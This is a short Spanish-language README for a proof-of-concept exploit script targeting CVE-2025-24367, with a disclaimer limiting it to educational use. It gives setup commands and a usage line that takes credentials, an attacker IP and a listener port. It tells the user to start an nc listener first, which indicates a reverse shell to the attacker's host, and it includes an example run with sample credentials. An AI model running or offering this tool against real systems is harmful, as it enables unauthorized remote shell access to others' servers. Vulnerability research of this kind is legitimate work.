
Prueba de concepto para CVE-2025-24367
Importante — Léalo primero:
Este repositorio yexploit.pyse proporcionan solo con fines educativos y de investigación. No utilice este código contra sistemas, redes o servicios para los cuales no tenga autorización explícita y por escrito. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Al usar este código, usted acepta cumplir con las leyes aplicables y las políticas institucionales.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Antes de ejecutar el script, asegúrese de tener un listener de nc en ejecución. Ejecute el script sin proxy a menos que esté depurando:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Recordatorio final: Este script y el README son solo para uso educativo. Nunca utilice estas herramientas para acceder a sistemas de forma ilegal.